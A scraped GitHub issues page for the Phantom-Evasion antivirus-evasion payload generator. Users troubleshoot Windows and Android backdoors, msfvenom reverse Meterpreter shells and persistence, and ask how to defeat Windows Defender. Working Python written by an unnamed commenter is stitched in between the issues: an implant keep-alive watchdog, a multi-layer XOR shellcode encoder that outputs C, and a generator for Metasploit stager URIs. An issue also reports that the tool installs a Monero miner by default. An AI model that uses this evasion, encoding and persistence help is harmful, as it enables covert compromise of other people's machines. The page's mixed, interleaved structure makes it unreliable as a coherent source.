
phantom-evasion's People

Contributors

oddcod3, phra, wagi-coding

phantom-evasion's Issues

Insert certificate spoofing target issue

I am getting this error every time I reach the "Insert the certificate spoofing target (default: www.microsoft.com:443):" prompt.

Here is the error:

[>] Sign executable? (y/n):y

[>] Insert certificate spoofing target (default: www.microsoft.com:443): www.microsoft.com:443
Traceback (most recent call last):
  File "./phantom-evasion.py", line 718, in <module>
    complete_menu()
  File "./phantom-evasion.py", line 175, in complete_menu
    Phantom_lib.shellcode_completer(module_type)
  File "Setup/Phantom_lib.py", line 1538, in shellcode_completer
    module_launcher1(module_type)
  File "Setup/Phantom_lib.py", line 1425, in module_launcher1
    auto_compiler(module_choice,Arc,output_filename)
  File "Setup/Phantom_lib.py", line 1242, in auto_compiler
    exe_signer(filename)
  File "Setup/Phantom_lib.py", line 422, in exe_signer
    cert.set_notBefore(x509.get_notBefore())
  File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 1328, in set_notBefore
    return self._set_boundary_time(_lib.X509_get_notBefore, when)
  File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 1315, in _set_boundary_time
    return _set_asn1_time(which(self._x509), when)
  File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 120, in _set_asn1_time
    set_result = _lib.ASN1_TIME_set_string(boundary, when)
AttributeError: 'module' object has no attribute 'ASN1_TIME_set_string'

Do I have to update something?

error in android module

@oddcod3 I got the following while generating an android payload:

[screenshot]

While obfuscating the smali code there is an exception:

[screenshot]

Payload that I use: android/meterpreter/reverse_tcp

Msfvenom payload gets detected after encoding!

My payload is undetectable but my msfvenom meterpreter (windows/vncinject/reverse_tcp) gets detected! I also encoded it with x86/shikata_ga_nai + Triple Multibyte-key xor, but as soon as the meterpreter session opens, Windows detects it and kills it.

I can't create a backdoor.

Can somebody help me?
My problem is:
When I open Phantom-Evasion, two problems appear. The first says: [>] Package libc6-dev-i386 [Not found]. The second says: [Wine] Python not found.
I press Enter twice, because the same error appears again, and then the program opens apparently normally, but when I finish creating the backdoor an error appears and the backdoor is not created.
Help me please, I cannot create a backdoor.
NOTE: I downloaded the latest version of Python (version 3).
PHOTOS:
https://ibb.co/dRfYno: first error
https://ibb.co/ezwv08: second error

meterpreter session opened but no shell reverse_https

Hi, I have a problem with Phantom-Evasion. I created an x64 payload for reverse_https. I tried options 8,9,19,11,12 but they don't work. Meterpreter session opened but no shell with reverse_https. I turned off the AV.

When I use the msfvenom meterpreter it runs with a shell; when I use the Phantom meterpreter no shell opens :(

Logs below:

[>] Please insert LHOST: 172.21.65.139

[>] Please insert LPORT: 443

[>] Please insert output filename: 12

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): n

[>] Generating C meterpreter stager

[>] Compiling...

[>] Strip

strip is a GNU utility to "strip" symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)

[>] Strip executable? (y/n):n

[>] Sign Executable

Online Certificate spoofer & Executabe signer (Lower rate of detection)

[>] Sign executable? (y/n):n

[<>] File saved in Phantom-Evasion folder

[>] Press Enter to continue

#############################################################################

       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1853 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

[*] Starting persistent handler(s)...
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 10.29.196.29; (UUID: yfoqefyb) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (172.21.65.139:443 -> 10.29.196.29:62327) at 2019-01-29 05:38:06 -0500
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 10.29.196.29; (UUID: xrjzst41) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (172.21.65.139:443 -> 10.29.196.29:62392) at 2019-01-29 05:41:35 -0500

Error

Hello, when using the tool, in the part that asks for the file name, when I enter it I get the following error:

Traceback (most recent call last):
  File "./phantom-evasion.py", line 492, in <module>
    complete_menu()
  File "./phantom-evasion.py", line 260, in complete_menu
    Phantom_lib.shellcode_completer(module_type)
  File "Setup/Phantom_lib.py", line 961, in shellcode_completer
    module_launcher1(module_type)
  File "Setup/Phantom_lib.py", line 882, in module_launcher1
    Payload = payload_generator(payload_choice, Arc, commtype, port, "c")
UnboundLocalError: local variable 'commtype' referenced before assignment

I would like to know how to solve this problem, Thanks in advance.

Dmg Mac OSX

No session started when creating sessions with:
osx/x64/meterpreter/reverse_tcp
osx/meterpreter/reverse_tcp

When executing the dmg file on the victim machine I get an "image not recognized" error.

encoding problem

I'm trying to encode my miner to make it less detectable by converting it to shellcode and then compiling it using your module, but so far I'm unsuccessful.

The miner no longer works after compiling and getting the output file.

Also, when choosing anything other than None in the Encoding step I get this error:

[>] Generating code...

Traceback (most recent call last):
  File "Modules/payloads/Polymorphic_MHA_NDC_LLGPA_mathinject_windows.py", line 40, in <module>
    DecodeKit = encoding_manager(Encryption,Payload,Randbufname)
  File "Modules/payloads/auxiliar/usefull.py", line 76, in encoding_manager
    Payload = Multibyte_xor.Xor_stub2(Shellcode,Randbufname)
  File "Modules/payloads/encryption/Multibyte_xor.py", line 84, in Xor_stub2
    encrypted_shellcode=xor_encryption(shellcode.decode('string-escape'),key)
ValueError: invalid \x escape

Working on Kali.

Universal Meterpreter increments-trick module doesn't work

[>] Please type the number of the payload do want to use: python/meterpreter/reverse_tcp

[>] Please insert LHOST: 192.168.1.111

[>] Please insert LPORT: 4444

[>] Generating code...

No encoder or badchars specified, outputting raw payload
Payload size: 454 bytes

[>] Please insert output filename:payload
Traceback (most recent call last):
  File "Modules/payloads/Pytherpreter_10^8++.py", line 31, in <module>
    Randflag = usefull.varname_creator()
AttributeError: 'tuple' object has no attribute 'varname_creator'
824 INFO: PyInstaller: 3.4
832 INFO: Python: 2.7.15
842 INFO: Platform: Windows-7-6.1.7601-SP1
858 INFO: wrote Z:\pentest\Phantom-Evasion\payload.spec
903 INFO: UPX is not available.
Traceback (most recent call last):
  File "c:\Python27\lib\runpy.py", line 174, in _run_module_as_main
    "__main__", fname, loader, pkg_name)
  File "c:\Python27\lib\runpy.py", line 72, in _run_code
    exec code in run_globals
  File "C:\Python27\Scripts\pyinstaller.exe\__main__.py", line 9, in <module>
  File "c:\Python27\lib\site-packages\PyInstaller\__main__.py", line 111, in run
    run_build(pyi_config, spec_file, **vars(args))
  File "c:\Python27\lib\site-packages\PyInstaller\__main__.py", line 63, in run_build
    PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs)
  File "c:\Python27\lib\site-packages\PyInstaller\building\build_main.py", line 838, in main
    build(specfile, kw.get('distpath'), kw.get('workpath'), kw.get('clean_build'))
  File "c:\Python27\lib\site-packages\PyInstaller\building\build_main.py", line 784, in build
    exec(text, spec_namespace)
  File "<string>", line 17, in <module>
  File "c:\Python27\lib\site-packages\PyInstaller\building\build_main.py", line 189, in __init__
    raise ValueError("script '%s' not found" % script)
ValueError: script 'Z:\pentest\Phantom-Evasion\payload.py' not found
Traceback (most recent call last):
  File "./phantom-evasion.py", line 435, in <module>
    complete_menu()
  File "./phantom-evasion.py", line 322, in complete_menu
    Phantom_lib.pytherpreter_completer(module_type,"False")
  File "Setup/Phantom_lib.py", line 667, in pytherpreter_completer
    pytherpreter_launcher(Paytime,module_type,wine)
  File "Setup/Phantom_lib.py", line 706, in pytherpreter_launcher
    auto_pyinstall(Filename,wine)
  File "Setup/Phantom_lib.py", line 756, in auto_pyinstall
    os.rename(bwd,filename)
OSError: [Errno 2] No such file or directory

Persistence Improvements

According to the README, the Timebased Persistence Method checks for a specific process name to be running.
This is a major problem if you're using the PrependMigrateProc option to, let's say, the svchost.exe process, of which Windows spawns multiple instances by default.
That's why you will never be able to tell if the process is still running.

There is a much better way:
The meterpreter process could simply lock a specific file (for example its own executable), and the KeepAlive process could check if there is a lock on this file.
If the meterpreter process dies, Windows will automatically remove the lock.
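Added example (my code, not Phantom-Evasion's) of the lock-based liveness check proposed above. The property the proposal relies on is that the kernel, not the program, releases the lock when the holder exits, so a watchdog never has to guess which of several same-named processes is the right one. It is written for POSIX (flock via fcntl) so it runs where the rest of this page's tooling runs; the Windows equivalent would be opening the file with a share mode of 0 (or msvcrt.locking) and having the watchdog attempt the same open, which is my assumption rather than something the post specifies. The "holder" child below is a constructed stand-in for the implant process.

```python
import fcntl
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for the implant: take an exclusive lock on argv[1],
# report that it holds it, then idle until killed. Nothing else.
HOLDER_SRC = r"""
import fcntl, sys, time
f = open(sys.argv[1], "rb")
fcntl.flock(f, fcntl.LOCK_EX)
print("locked", flush=True)
time.sleep(60)
"""


def lock_is_held(path):
    """Watchdog side: True if some other process holds an exclusive lock on path.

    A non-blocking LOCK_EX attempt either succeeds (nobody holds it; release it
    again immediately) or raises BlockingIOError (somebody alive holds it).
    """
    with open(path, "rb") as f:
        try:
            fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
        except BlockingIOError:
            return True
        fcntl.flock(f, fcntl.LOCK_UN)
        return False


def start_holder(path):
    """Spawn the stand-in implant and block until it confirms it owns the lock."""
    proc = subprocess.Popen([sys.executable, "-c", HOLDER_SRC, path],
                            stdout=subprocess.PIPE, text=True)
    assert proc.stdout.readline().strip() == "locked"
    return proc


def demo():
    """Return (held_while_alive, held_after_death) as seen by the watchdog."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        holder = start_holder(path)
        held_while_alive = lock_is_held(path)
        holder.kill()                 # simulate the implant dying
        holder.wait()
        holder.stdout.close()
        held_after_death = lock_is_held(path)   # kernel dropped the lock with the process
        return held_while_alive, held_after_death
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())   # (True, False)
```

The watchdog never needs a PID or a process name; a hung-but-alive implant still holds the lock, so this answers "is it running", not "is it connected", which is the separate point raised in the next issue.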

Additional Options needed - keep alive

  • Issue 1
    Something I noticed was that if the reverse_tcp meterpreter session died, it didn't spawn/create a new one. If this isn't in it yet, it is really important to add this quickly.
    I know there is a post-exploitation module that should implement this, but I'm not sure if that works correctly.

Rerunning the reverse_tcp shellcode every x seconds needs to be in the file itself! Any persistence as a second file is not good. Starting the main file itself is very CPU-intensive due to the AV bypass methods. That's why it needs to be inside!
Like this:

int main(void) {

    junkcode();
    unsigned char custom_shellcode[] = "...";

    for (;;) {
        execute_shellcode(custom_shellcode);
        delay(10000);
    }

}

Keeping the process alive is important, but it's also important that the process itself reconnects if errors happen, otherwise the process would still be alive but with a broken connection >> no shell.

-> Will be implemented

  • Issue 2
    It would be nice to add other options besides LHOST and LPORT, like PrependMigrate and PrependMigrateProc, just like you would in msfvenom.

    I tried to work around this by creating C shellcode with msfvenom and choosing it instead of the default meterpreter in Phantom-Evasion, but it didn't work (compiling worked but it didn't connect).
    I pasted the shellcode as one line. Was that the correct way?
    (see this other issue)

using stageless payloads make phantom evasion crash

hi,

If you select a stageless payload, such as windows/x64/meterpreter_reverse_https, phantom-evasion will crash during the XOR encryption with the following error:

OSError: [Errno 7] Argument list too long

Probably the stageless payload is bigger than the argv argument size limit.
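Added example (my code, not Phantom-Evasion's) reproducing the failure mode above and the fix it implies. Handing the escaped shellcode text to a helper script as a command-line argument runs into the kernel's argv limits: on Linux a single argument is capped at 128 KiB independently of ARG_MAX, and execve fails with E2BIG before the helper starts. A stageless meterpreter is a few hundred kilobytes of raw bytes and four times that once written as "\xNN" text, so it cannot fit. Feeding the same text through stdin has no such limit. The helper one-liners and the payload sizes are constructed stand-ins; the 128 KiB figure is Linux-specific.

```python
import subprocess
import sys

# Constructed stand-in for a helper script that receives the payload as argv[1].
ARGV_HELPER = "import sys; print(len(sys.argv[1]))"
# The same helper reading the payload from stdin instead.
STDIN_HELPER = "import sys; print(len(sys.stdin.buffer.read()))"


def escaped_payload(nbytes: int) -> bytes:
    """Constructed stand-in: nbytes of shellcode written as \\xNN text (4 chars per byte)."""
    return b"\\x90" * nbytes


def run_via_argv(blob: bytes):
    """Pass the text as argv[1]. Returns (True, length seen) or (False, errno) if exec fails."""
    try:
        out = subprocess.run([sys.executable, "-c", ARGV_HELPER, blob.decode("ascii")],
                             capture_output=True, text=True, check=True)
    except OSError as e:          # the child never executed: E2BIG on Linux/macOS
        return False, e.errno
    return True, int(out.stdout)


def run_via_stdin(blob: bytes) -> int:
    """Pass the text through a pipe: the helper sees every byte regardless of size."""
    out = subprocess.run([sys.executable, "-c", STDIN_HELPER],
                         input=blob, capture_output=True, check=True)
    return int(out.stdout)


if __name__ == "__main__":
    for n in (500, 400_000):       # a staged stager vs. a stageless-sized payload
        text = escaped_payload(n)
        print(n, run_via_argv(text), run_via_stdin(text))
```

The same applies to the tool's approach of calling a module script with the encoded buffer as an argument: writing the buffer to a temporary file or piping it is the change that removes the size dependence, not a larger shell limit.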

Av evasion issue

It's undetectable up to Windows 10 v1709, but in v1803 it was detected by Windows Defender. Any workaround to evade it? Version 1.0 released, will retest it.

Unable to open resigned.apk

Everything runs fine except when trying to resign the apk. It gives the output "unable to open resigned.apk as zip archive", caused by java.lang.ClassNotFoundException: sun.misc.BASE64Encoder.

x64 payload errors windows

Greetings,

I would like to say thanks for such a nice tool. I tried the x64 payload for Windows but failed to generate it. I think there is an issue with the x64 platform.

One more thing: I chose N for the miner, but whenever I use a payload generated via Phantom my AV pops up after a while saying CryptoMiner.Gen C:\Users\tehseen\AppData\Local\Google\Chrome\User Data\Default\Cache\f_008345

After a while the AV will trace out the generated payload too. Kindly look into this issue.

Avira and windows defender both detecting this.

Regards
Tehseen

Problem Installing Phantom

I am missing something because I can't seem to install this onto my machine.
Could you please help?

[screenshot]

My distro is not included in the "Compatible" list, but ParrotSec is a Kali-based pen testing distro.
I'm just confused as to how to install the needed modules. I tried "sudo apt install -f", but no help.
Please and thank you.

UPDATE:
I tried this method, but got the same results.
Install both 2.7 versions.
https://superuser.com/questions/328216/install-python-pywin32-in-wine

Unable to bind an android payload

I'm unable to bind a payload. I don't know what the issue is. Can anyone please help solve it?
This is the error I'm getting every time.

[>] Smaling...

I: Using Apktool 2.3.3
brut.directory.PathNotExist: apktool.yml

[>] Please insert output filename: kuchbhi.apk
Traceback (most recent call last):
  File "phantom-evasion.py", line 441, in <module>
    complete_menu()
  File "phantom-evasion.py", line 295, in complete_menu
    Phantom_lib.droidmare_launcher()
  File "Setup/Phantom_lib.py", line 1799, in droidmare_launcher
    apksigner()
  File "Setup/Phantom_lib.py", line 1635, in apksigner
    os.rename('msf_rebuild.apk',Apk_out)
OSError: [Errno 2] No such file or directory

Error create custom shellcode

[*] choose how to supply shellcode:

[1] Msfvenom

[2] Custom shellcode

[0] Back

[>] Please insert option: 2

[>] Please enter custom shellcode (example: \xff\xbc\xb9\a6 ): \xff

[>] Enter output filename: w

[>] Please insert compiler option (x86 or x64): x86

[>] Encoding step:

[1] None (none)

[2] Multibyte-key xor (good)

[3] Double Multibyte-key xor (excellent)

[4] Triple Multibyte-key xor (excellent)

[>] Please enter options number: 1

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code
PRO: Longer execution time,Lower rate of detection.

[>] Add multiple processes behaviour?(y/n): n

[>] Generating code...

Traceback (most recent call last):
  File "Modules/payloads/ShellcodeInjection_heap_windows.py", line 35, in <module>
    SpawnMultiProc = int(sys.argv[1])
ValueError: invalid literal for int() with base 10: ''

[Need Help] Unable To Use Persistence Modules

The payload I created did give me meterpreter access to the target machine, but I am unable to make it persistent.

The first "Windows Persistence RegCreateKeyExW Add Registry Key" post-exploitation module asks to 'insert file path to add to startup'; I'm unable to understand which file and which path it needs:
the payload on Kali or the one on the target machine.
I tried adding the Kali path of the payload, then uploaded and executed the file through meterpreter, but the payload didn't start once I restarted the target machine.
Please help.

Couldn't get meterpreter session

I used the Windows modules, then option 3 (Windows Polymorphic Multipath VirtualAlloc NoDirectCall GPA/GMH) and also option 6 (Windows Polymorphic Multipath Heapalloc NoDirectCall GPA/GMH). Tried with x86 and x64 but I didn't get any session.

Target: Windows 10 v1803 and v1709.
Using Kali Linux 2018.2.

Doesn't work/save on MacOS

Running it on macOS itself works fine, but after you have chosen every option and it's finally generating/compiling the file and says 'Saving file to Phantom-Evasion Folder', it doesn't actually save any file.

not sure

Unable to open 'resigned.apk' as zip archive
Traceback (most recent call last):
  File "phantom-evasion.py", line 422, in <module>
    complete_menu()
  File "phantom-evasion.py", line 276, in complete_menu
    Phantom_lib.droidmare_launcher()
  File "Setup/Phantom_lib.py", line 1552, in droidmare_launcher
    os.remove("msf_rebuild.apk")
OSError: [Errno 2] No such file or directory: 'msf_rebuild.apk'

Can't run phantom-evasion.py

Getting this error when I tried to run phantom-evasion.py (tried executing with both the python and ./ commands). Sorry if I'm just retarded, I'm a beginner.

Error:

Traceback (most recent call last):
  File "./phantom-evasion.py", line 32, in <module>
    import Phantom_lib
  File "Setup/Phantom_lib.py", line 28, in <module>
    from OpenSSL import crypto
ImportError: No module named OpenSSL

Autorun..

Is there a working method to make the RAT autorun on the target (Windows) machine?

For instance, say I download the file from a server onto my target Windows machine; is it possible to configure the script to autorun after download?

suggestion

Please add 32-bit and 64-bit windows/meterpreter/reverse_https polymorphic stagers, as tcp and http are easily detected by Windows Defender.

google protect

The apk file created by Phantom-Evasion is identified by Google Protect on the device.

How to generate an undetectable payload?

I have a problem. Every payload that I create for Windows gets detected, even by free Avast. What am I doing wrong? I tried various options for Windows. I will paste one of them below so that you can see exactly.

I tried Windows modules -> Shellcode Injection or Stager -> I've probably tried all the options for these modules.

Can you tell me what I'm doing wrong? ;)

[*] choose how to supply shellcode:

[1] Msfvenom

[2] Custom shellcode

[0] Back

[>] Please insert option: 1

[>] Please enter msfvenom payload (example: windows/meterpreter/reverse_tcp):windows/meterpreter/reverse_https

[>] Please insert LHOST: 192.168.51.2

[>] Please insert LPORT: 443

[>] Custom msfvenom options(default: blank):

[>] Encoding step:

[1] x86/xor_dynamic (average)

[2] x86/xor_dynamic + Multibyte-key xor (good)

[3] x86/xor_dynamic + Double Multibyte-key xor (excellent)

[4] x86/xor_dynamic + Triple Multibyte-key xor (excellent)

[>] Please enter options number: 4

[>] Enter output filename: michal-443

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): y

[>] Insert number of decoy processes (integer between 1-3): 2

[>] Generating code...

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/xor_dynamic
x86/xor_dynamic succeeded with size 519 (iteration=0)
x86/xor_dynamic chosen with final size 519
Payload size: 519 bytes
Final size of c file: 2205 bytes

[>] Triple-key Xor multibyte encoding...

[>] Compiling...

[>] Strip

strip is a GNU utility to "strip" symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)

[>] Strip executable? (y/n):y

[>] Stripping...

[>] Sign Executable

Online Certificate spoofer & Executabe signer (Lower rate of detection)

[>] Sign executable? (y/n):y

Certificates directory is not empty , use already existing certificate? (y/n): n

[>] Insert certificate spoofing target (default: www.microsoft.com:443): www.google.com:443

[>] Insert sign software description (default: Notepad Benchmark Util):

[>] Signing m443.exe with osslsigncode...

[>] Succeeded

[<>] File saved in Phantom-Evasion folder
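Added example (my code, not Phantom-Evasion's) of what the "Multibyte-key xor" / "Double" / "Triple Multibyte-key xor" encoding step in the transcript above does to the shellcode before it is compiled into the stager: each layer XORs the buffer with a fresh random key, cycling the key over the buffer, and the compiled stager reverses the layers at runtime. It goes one step beyond the tool's menu to show why the layer count is not a strength setting: XOR layers commute, so any number of cyclic-key XOR layers collapse into a single XOR with one key of length lcm(key lengths). Key lengths of 4 to 16 bytes and the emitted C variable names are my assumptions; the C output mimics the msfvenom -f c style. A practitioner's caveat: this only changes how the bytes look at rest in the stager, it has no bearing on what runs in memory once the stage arrives, which is consistent with the "detected after the session opens" reports elsewhere on this page.

```python
import random
from math import gcd


def xor_multibyte(data: bytes, key: bytes) -> bytes:
    """XOR data with key, cycling the key (the tool's "Multibyte-key xor")."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_layers(shellcode: bytes, layers: int, seed=None):
    """Apply `layers` rounds (1 = single, 2 = Double, 3 = Triple) with fresh random keys.

    Returns (encoded, keys). Keys of 4..16 non-zero bytes are an assumption, not the tool's sizes.
    """
    rng = random.Random(seed)
    keys, buf = [], shellcode
    for _ in range(layers):
        key = bytes(rng.randrange(1, 256) for _ in range(rng.randint(4, 16)))
        buf = xor_multibyte(buf, key)
        keys.append(key)
    return buf, keys


def decode_layers(encoded: bytes, keys) -> bytes:
    """What the compiled stager does at runtime before jumping to the buffer."""
    buf = encoded
    for key in reversed(keys):
        buf = xor_multibyte(buf, key)
    return buf


def combined_key(keys) -> bytes:
    """The single key equivalent to all layers: the keys XORed together, cycled over lcm(len) bytes."""
    n = 1
    for k in keys:
        n = n * len(k) // gcd(n, len(k))
    combo = bytes(n)
    for k in keys:
        combo = xor_multibyte(combo, k)
    return combo


def to_c(encoded: bytes, keys) -> str:
    """Emit the encoded buffer and its keys as C string literals (msfvenom -f c style)."""
    def arr(name, data):
        return f'unsigned char {name}[] = "' + "".join(f"\\x{b:02x}" for b in data) + '";'
    return "\n".join([arr("buf", encoded)] + [arr(f"key{i + 1}", k) for i, k in enumerate(keys)])


if __name__ == "__main__":
    sc = bytes(range(256))                      # constructed stand-in for shellcode
    enc, keys = encode_layers(sc, 3, seed=7)    # "Triple Multibyte-key xor"
    print(to_c(enc, keys))
    print(decode_layers(enc, keys) == sc, xor_multibyte(sc, combined_key(keys)) == enc)
```

Because the layers commute, the decode order does not matter either; what a signature engine sees is one XOR-obfuscated constant plus a small decode loop, exactly as with a single key.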

Typo line 1457 & 1466 (Setup/Phantom_lib.py)

There is a typo in the Phantom_lib.py file at the two lines listed in the subject. This is the error thrown:
Traceback (most recent call last):
  File "phantom-evasion.py", line 718, in <module>
    complete_menu()
  File "phantom-evasion.py", line 175, in complete_menu
    Phantom_lib.shellcode_completer(module_type)
  File "Setup/Phantom_lib.py", line 1543, in shellcode_completer
    module_launcher2(module_type)
  File "Setup/Phantom_lib.py", line 1466, in module_launcher2
    Proc_arch == "x64"
NameError: global name 'Proc_arch' is not defined

I have fixed it by removing a single "="

Figured it may be useful for others getting similar errors.

No session being spawned for reverse_http

Hello,

I am unable to get Phantom-Evasion to spawn a meterpreter session. I've generated a reverse_http payload using msfvenom that works, and to see what the executable sends I ran a Netcat session on the LPORT specified. This is the output that it gives:

root@metaserver:~# nc -l -p 80 -v
listening on [any] 80 ...
connect to [x.x.x.x] from somehost [y.y.y.y] 55018
GET /Ap3DYbrymVBexF_FA4HrQwhp2ukn0z8302GFyFmx7XWCxWK9YXCGx1ge3I-xSVcq HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Connection: Keep-Alive
Cache-Control: no-cache

When I run the executable generated from Phantom-Evasion and run Netcat on the host, it gives me the following:

root@metaserver:~# nc -l -p 80 -v
listening on [any] 80 ...
connect to [x.x.x.x] from somehost [y.y.y.y] 55116
GET /Mcy3 HTTP/1.1
Accept-Encoding: identity
Host: x.x.x.x:80
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT

The msfvenom command I use to generate the reverse_http payload is:

msfvenom --encoder cmd/powershell_base64 --payload windows/meterpreter/reverse_http LHOST=x.x.x.x LPORT=80 --arch x86 --platform win --format exe --out ~/reveresh.exe

The msfconsole output for the working msfvenom generated payload is:

       =[ metasploit v5.0.40-dev-                         ]
+ -- --=[ 1914 exploits - 1072 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion                                       ]

[*] Processing ./automate.rc for ERB directives.
resource (./automate.rc)> use multi/handler
resource (./automate.rc)> set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
resource (./automate.rc)> set LHOST x.x.x.x
LHOST => x.x.x.x
resource (./automate.rc)> set LPORT 80
LPORT => 80
resource (./automate.rc)> set ExitOnSession false
ExitOnSession => false
resource (./automate.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (./automate.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...

[*] Started HTTP reverse handler on http://x.x.x.x:80
msf5 exploit(multi/handler) > [*] http://x.x.x.x:80 handling request from y.y.y.y; (UUID: ghbljues) Encoded stage with x86/shikata_ga_nai
[*] http://x.x.x.x:80 handling request from y.y.y.y; (UUID: ghbljues) Staging x86 payload (180854 bytes) ...
[*] Meterpreter session 1 opened (x.x.x.x:80 -> y.y.y.y:55150) at 2019-08-08 23:53:28 -0400

The msfconsole output for the Phantom-Evasion generated payload, which never produces a session, is:

       =[ metasploit v5.0.40-dev-                         ]
+ -- --=[ 1914 exploits - 1072 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion                                       ]

[*] Processing ./automate.rc for ERB directives.
resource (./automate.rc)> use multi/handler
resource (./automate.rc)> set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
resource (./automate.rc)> set LHOST x.x.x.x
LHOST => x.x.x.x
resource (./automate.rc)> set LPORT 80
LPORT => 80
resource (./automate.rc)> set ExitOnSession false
ExitOnSession => false
resource (./automate.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (./automate.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...

[*] Started HTTP reverse handler on http://x.x.x.x:80

It never begins a session which I believe has something to do with the Netcat output from above. I have tried every reverse_http option available in both X86 and X64.

Does anyone have any ideas?

Thanks in advance!
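Added example (my code, neither Phantom-Evasion's nor Metasploit's) showing how the handler decides whether a GET like the two captured above is a stager request, since the obvious suspect, the very different URI lengths, is not the problem. Metasploit routes reverse_http(s) requests by an 8-bit checksum of the first path segment (the sum of its bytes modulo 256); 92 marks a Windows stager asking for its stage. The long msfvenom URI additionally embeds a payload UUID, the short one does not, but both sum to 92 and both are therefore accepted as stage requests. The constants below are what I recall from Metasploit's Rex::Payloads::Meterpreter::UriChecksum and should be treated as assumptions to confirm against your installed version. My reading of the second capture, not something the post establishes, is that its headers (Accept-Encoding: identity, Connection: close, the truncated "MSIE 6.1" agent) look like a Python HTTP client rather than the native Windows stager, so the handler's payload type may simply not match what the binary contains.

```python
import random
import string

# Assumed from memory of Metasploit's UriChecksum module; verify against your install.
URI_CHECKSUM_INITW = 92   # Windows stager: "send me the stage"
URI_CHECKSUM_INITJ = 88   # Java stager
URI_CHECKSUM_INITP = 80   # Python stager
URI_CHECKSUM_CONN = 98    # an established session reconnecting

_NAMES = {92: "INITW", 88: "INITJ", 80: "INITP", 98: "CONN"}

# The two requests captured with Netcat in the post above.
MSFVENOM_URI = "/Ap3DYbrymVBexF_FA4HrQwhp2ukn0z8302GFyFmx7XWCxWK9YXCGx1ge3I-xSVcq"
PHANTOM_URI = "/Mcy3"


def checksum8(uri: str) -> int:
    """Sum of the bytes of the first path segment, modulo 256."""
    segment = uri.lstrip("/").split("/", 1)[0].split("?", 1)[0]
    return sum(segment.encode("ascii")) % 256


def classify(uri: str) -> str:
    """Which request type the handler would file this URI under."""
    return _NAMES.get(checksum8(uri), "ignored")


def generate_uri(target: int = URI_CHECKSUM_INITW, length: int = 4, seed=None) -> str:
    """Random alphanumeric URI whose checksum8 equals `target`, like '/Mcy3' above."""
    rng = random.Random(seed)
    alphabet = string.ascii_letters + string.digits
    while True:
        candidate = "".join(rng.choice(alphabet) for _ in range(length))
        if checksum8(candidate) == target:
            return "/" + candidate


if __name__ == "__main__":
    for u in (MSFVENOM_URI, PHANTOM_URI, generate_uri(seed=1)):
        print(u, checksum8(u), classify(u))
```

From a detection standpoint the same arithmetic runs in reverse: a short, random-looking path whose first segment sums to 92, 80, 88 or 98 modulo 256, arriving with a "Connection: close" or Trident-style agent, is a cheap and surprisingly specific indicator for Meterpreter staging traffic.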

Consider removing Monero Miner.

As part of the automatic setup and dependency check, Phantom-Evasion installs the xmr-stak Monero cryptocurrency miner. I know you mention as much in the README of the repository, but simply installing it and turning it on by default seems disingenuous at best and actively malicious at worst.

If you insist on including the miner, I think more transparency with regard to this would be beneficial. I would suggest that after running the setup procedure and installing all the dependencies required by the tool, you prompt the user and ask something along the lines of:

In order to support the developer of this tool/framework, you can help out by allowing the program to install a Monero miner alongside the program's main functionality. The miner will be configured to use a low amount of system resources and can be deactivated at any time should you wish to do so.

